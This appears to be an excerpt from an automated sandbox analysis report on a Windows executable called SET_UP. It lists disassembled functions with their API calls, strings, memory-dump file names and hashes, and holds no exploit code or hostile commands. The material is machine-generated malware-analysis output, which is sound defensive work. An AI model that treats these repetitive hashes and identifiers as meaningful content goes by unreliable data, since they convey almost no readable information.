                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalProfileSectionStringlstrcmpi$EnterLeave
                                                                                                                                                                                                  • String ID: english$hangeul$hangeulmenu$kanji$kanjimenu$roman$windows
                                                                                                                                                                                                  • API String ID: 1105401458-111014456
                                                                                                                                                                                                  • Opcode ID: 88af9852d97e4a00fbbf2b1755086f985ebb437eda2a136736e22f51507b52c9
                                                                                                                                                                                                  • Instruction ID: 053c822bdb67e943871b36e24ff51ca3f0690f3602dde31ac2d7b0a2ab354bbb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88af9852d97e4a00fbbf2b1755086f985ebb437eda2a136736e22f51507b52c9
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF01F77664434A7AD350A354EC45FAF3FACB7A5B08F040565F580A22E1EBB464089B66
                                                                                                                                                                                                  Function 0041D7B9 Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 292COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041D7BE
                                                                                                                                                                                                    • Part of subcall function 004B1F9A: lstrlenW.KERNEL32(00000000,00000000,?,?,004C4ED0,?,?,0041EFCC,?,00508FBC,AppFolder,00000000), ref: 004B1FC4
                                                                                                                                                                                                  • WinHttpOpen.WINHTTP(?,?,?,00000000,00000000), ref: 0041D876
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prologHttpOpenlstrlen
                                                                                                                                                                                                  • String ID: 3
                                                                                                                                                                                                  • API String ID: 1889296618-1842515611
                                                                                                                                                                                                  • Opcode ID: a0e750954a8bc57066090b094fb842a1ad9bd76fd7e3bbf3ea8c084b19d4ac18
                                                                                                                                                                                                  • Instruction ID: 54514846c4f22e90c0294d729db4f2656616c93d8868f050e0d49f2e970b1be0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a0e750954a8bc57066090b094fb842a1ad9bd76fd7e3bbf3ea8c084b19d4ac18
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61B159B1D04209EFCF15DF94C894AEEBBB5BF18354F20416EE512A32A1D7389E44CB65
                                                                                                                                                                                                  Function 004C41FD Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 111stringwindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C4202
                                                                                                                                                                                                    • Part of subcall function 004C68EF: EnterCriticalSection.KERNEL32(0050B348,?,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8), ref: 004C692A
                                                                                                                                                                                                    • Part of subcall function 004C68EF: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8), ref: 004C693C
                                                                                                                                                                                                    • Part of subcall function 004C68EF: LeaveCriticalSection.KERNEL32(0050B348,?,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8), ref: 004C6945
                                                                                                                                                                                                    • Part of subcall function 004C68EF: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,004C665E,00000010,?,00000000,?,?,?,004C4BA2,Vht ,004111C1,004C4BA8,004B5FEA), ref: 004C6957
                                                                                                                                                                                                  • LoadBitmapW.USER32(?,00007912), ref: 004C4239
                                                                                                                                                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 004C424B
                                                                                                                                                                                                  • GetSystemMetrics.USER32(0000002A), ref: 004C42A5
                                                                                                                                                                                                  • lstrcpyW.KERNEL32(?,Small Fonts,?,0000000A), ref: 004C42BF
                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 004C42E5
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004C4315
                                                                                                                                                                                                  • GetTextMetricsW.GDI32(?,?), ref: 004C4327
                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 004C4338
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalSection$Object$EnterMetricsSelect$BitmapCreateFontH_prologIndirectInitializeLeaveLoadSystemTextlstrcpy
                                                                                                                                                                                                  • String ID: $Small Fonts$Terminal
                                                                                                                                                                                                  • API String ID: 1234877182-3042510724
                                                                                                                                                                                                  • Opcode ID: d1afbe2c1e5c2f82b537feb478a92327b06128361ce9a249851067cbc34ea8ce
                                                                                                                                                                                                  • Instruction ID: a1ade8ff440ca242514af1400af706deda9d7c3c076b303ecc19a7bcd3717eda
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1afbe2c1e5c2f82b537feb478a92327b06128361ce9a249851067cbc34ea8ce
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0941C475A002099FEB60DFA5DD95F9E7BB8FB44304F0444AEF514E22A1EB785A48CF24
                                                                                                                                                                                                  Function 00415D4F Relevance: 19.7, APIs: 13, Instructions: 159COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCapture.USER32 ref: 00415D58
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00415D75
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00415D83
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415DE4
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415DF5
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E02
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E1D
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E63
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E74
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E83
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00415E9A
                                                                                                                                                                                                  • PtInRect.USER32(?,?,?), ref: 00415EDA
                                                                                                                                                                                                  • SetCursor.USER32(?), ref: 00415EE7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsSystem$Rect$CaptureClientCopyCursor
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 282267412-0
                                                                                                                                                                                                  • Opcode ID: a3ebdbf3bf7db2c6e860947962f09a6db4cf2dfd3c1b24c154764403165513a7
                                                                                                                                                                                                  • Instruction ID: 2b0d34dc273c18520a77f17b944b00958b2f653f2b10ed1d82eeb29f532a9e67
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a3ebdbf3bf7db2c6e860947962f09a6db4cf2dfd3c1b24c154764403165513a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10512931A007199FCF18DFA9C999AEEBBF5AF88304F14452EE506E3350D774A580CB14
                                                                                                                                                                                                  Function 00428FA9 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 163COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00428FAE
                                                                                                                                                                                                  • __ftol.LIBCMT ref: 00429008
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00429040
                                                                                                                                                                                                  • __allrem.LIBCMT ref: 00429075
                                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004290C5
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$H_prolog__allrem__ftol
                                                                                                                                                                                                  • String ID: %.3f$%d:%02d$%d:%02d.%03d$%d:%02d:%02d$%d:%02d:%02d.%03d$d
                                                                                                                                                                                                  • API String ID: 3512649120-421013915
                                                                                                                                                                                                  • Opcode ID: 49a7c50b7b1c30ed6408f0b52d999b4129a79a7579129b918c03dc9655f88de5
                                                                                                                                                                                                  • Instruction ID: 0c6a34c948fb92af345da394e9623df9e4bab39ff0284ffd81ee5fa0d0ec51f6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 49a7c50b7b1c30ed6408f0b52d999b4129a79a7579129b918c03dc9655f88de5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C41D6B1B0022EAFEF14AE56DC46DBF776AEB48304F54443FB91092241D6B99D10C7A9
                                                                                                                                                                                                  Function 0041085F Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 110windowregistryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004C657B: TlsGetValue.KERNEL32(0050B044,?,00000000,004C4B8C,004111C1,004C4BA8,004B5FEA,004B9143,?,00000000,?,004AEEBC,00000000,00000000,00000000,00000000), ref: 004C65BA
                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(commdlg_LBSelChangedNotify,Function_000111C1), ref: 004108B7
                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(commdlg_ShareViolation), ref: 004108C3
                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(commdlg_FileNameOK), ref: 004108CF
                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(commdlg_help), ref: 004108DB
                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(commdlg_SetRGBColor), ref: 004108E7
                                                                                                                                                                                                    • Part of subcall function 004B54E9: SetWindowLongW.USER32(?,000000FC,00000000), ref: 004B5518
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000111,0000E146,00000000), ref: 004109C6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageWindow$Register$LongSendValue
                                                                                                                                                                                                  • String ID: commdlg_FileNameOK$commdlg_LBSelChangedNotify$commdlg_SetRGBColor$commdlg_ShareViolation$commdlg_help
                                                                                                                                                                                                  • API String ID: 2377901579-3814289011
                                                                                                                                                                                                  • Opcode ID: 75a7b3f6ef78bd165029fab9382ccebb8b4594cebf7c0827d53680529ce0173f
                                                                                                                                                                                                  • Instruction ID: 5c2a92680b80dca41fe09fd4cb97c78a7277560dc1a37b47210954bdcc7f302e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75a7b3f6ef78bd165029fab9382ccebb8b4594cebf7c0827d53680529ce0173f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD41C770600305EBEF319F52DC99FEE3BA0EB54350F10442BF845562A2D7B998C4DBA9
                                                                                                                                                                                                  Function 004C56F8 Relevance: 18.1, APIs: 7, Strings: 5, Instructions: 66stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • lstrcmpA.KERNEL32(?,004DC640,00000002,?,?,00000000,004C56AD,?,?,00000002,00000000,00000000), ref: 004C570E
                                                                                                                                                                                                  • lstrcmpA.KERNEL32(?,004DC63C,?,?,00000000,004C56AD,?,?,00000002,00000000,00000000), ref: 004C5726
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcmp
                                                                                                                                                                                                  • String ID: Automation$Embedding$Unregister$Unregserver$dde
                                                                                                                                                                                                  • API String ID: 1534048567-1842294661
                                                                                                                                                                                                  • Opcode ID: c16441f9d53fd7198a1bb9fc24d218fcf7f653807f1c21d4b3b65ffa029c4e5d
                                                                                                                                                                                                  • Instruction ID: 78ddf47b6bcaf2e209bf009eebd46559588f67293dc92caa4ed3689fdd949687
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c16441f9d53fd7198a1bb9fc24d218fcf7f653807f1c21d4b3b65ffa029c4e5d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1011A3BD201B02E6D6606B72CC99F2F76EC9B50785F14693FA40292241DBBCF4C6867C
                                                                                                                                                                                                  Function 0049C4B8 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C4D6
                                                                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C4EA
                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C50B
                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0049C542
                                                                                                                                                                                                  • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,00496853), ref: 0049C562
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,00000000,?,00000000,?,?,?,00496853), ref: 0049C580
                                                                                                                                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,00496853), ref: 0049C5B5
                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,000000FF,00000000,ShI,?,00000000,?,?,?,00496853), ref: 0049C5E5
                                                                                                                                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000,?,00000000,?,?,?,00496853), ref: 0049C61B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                  • String ID: ShI
                                                                                                                                                                                                  • API String ID: 158306478-866079072
                                                                                                                                                                                                  • Opcode ID: 92519848f3a1e1d36107dcb254d786cb262749d1adc4da3d3358e5df32cb98dd
                                                                                                                                                                                                  • Instruction ID: 79cc1b1de7b24a31e6c027c2888f335c50317d72b65bed5a9d8d5bf819e594bb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 92519848f3a1e1d36107dcb254d786cb262749d1adc4da3d3358e5df32cb98dd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4641F472504221BBEF316B299CC4B2B7E98EB45774F16053FF801D7290DB68AD458399
                                                                                                                                                                                                  Function 0042CF8F Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 107COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • Free %d-day trial, %d %s left., xrefs: 0042D0A8
                                                                                                                                                                                                  • Your free %d-day trial has expired!, xrefs: 0042CFF5
                                                                                                                                                                                                  • days, xrefs: 0042D09C, 0042D0A1
                                                                                                                                                                                                  • Your free trial has expired!, xrefs: 0042CFE0
                                                                                                                                                                                                  • Your license has expired![Expiration date: %d-%d-%d], xrefs: 0042D02D
                                                                                                                                                                                                  • This product is licensed to:%s, xrefs: 0042D05D
                                                                                                                                                                                                  • This product is licensed to:%s[Expiration date: %d-%d-%d], xrefs: 0042D04A
                                                                                                                                                                                                  • day, xrefs: 0042D095
                                                                                                                                                                                                  • This license doesn't work with the current version., xrefs: 0042D00B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: Free %d-day trial, %d %s left.$This license doesn't work with the current version.$This product is licensed to:%s$This product is licensed to:%s[Expiration date: %d-%d-%d]$Your free %d-day trial has expired!$Your free trial has expired!$Your license has expired![Expiration date: %d-%d-%d]$day$days
                                                                                                                                                                                                  • API String ID: 3519838083-1666988310
                                                                                                                                                                                                  • Opcode ID: 202f082522b631c2557fe5a75559d31a7afc5dc2ff13c355e1c68d22b4d7f19c
                                                                                                                                                                                                  • Instruction ID: 7e959b3ab071a181ece7b5d48c1308ba3350725bf71dc51048bcf30bd0f74d1f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 202f082522b631c2557fe5a75559d31a7afc5dc2ff13c355e1c68d22b4d7f19c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2415C31E0022EDACF15DF94E909ABE77A1EF14308F94405BB901622A0D77C9955DBAB
                                                                                                                                                                                                  Function 00401F45 Relevance: 16.7, APIs: 11, Instructions: 244COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 00401F84
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00401FF0
                                                                                                                                                                                                  • CopyRect.USER32(?,?), ref: 00401FFA
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00402087
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 00402098
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004020A5
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004020BC
                                                                                                                                                                                                    • Part of subcall function 004B5717: MoveWindow.USER32(?,?,00000001,?,?,?,?,00401FBE,?,?,?,?,00000001), ref: 004B5733
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MetricsSystem$Rect$Copy$ClientMoveWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 91314685-0
                                                                                                                                                                                                  • Opcode ID: 3ca9e7c86176172c290d5b894ab3984458f0cd5b74757a07d185ad32690b19a4
                                                                                                                                                                                                  • Instruction ID: 5ab8efa24b8bbd11978d2cede2bb51316ca7d57d0df16cbbe857fd5e581d3db1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ca9e7c86176172c290d5b894ab3984458f0cd5b74757a07d185ad32690b19a4
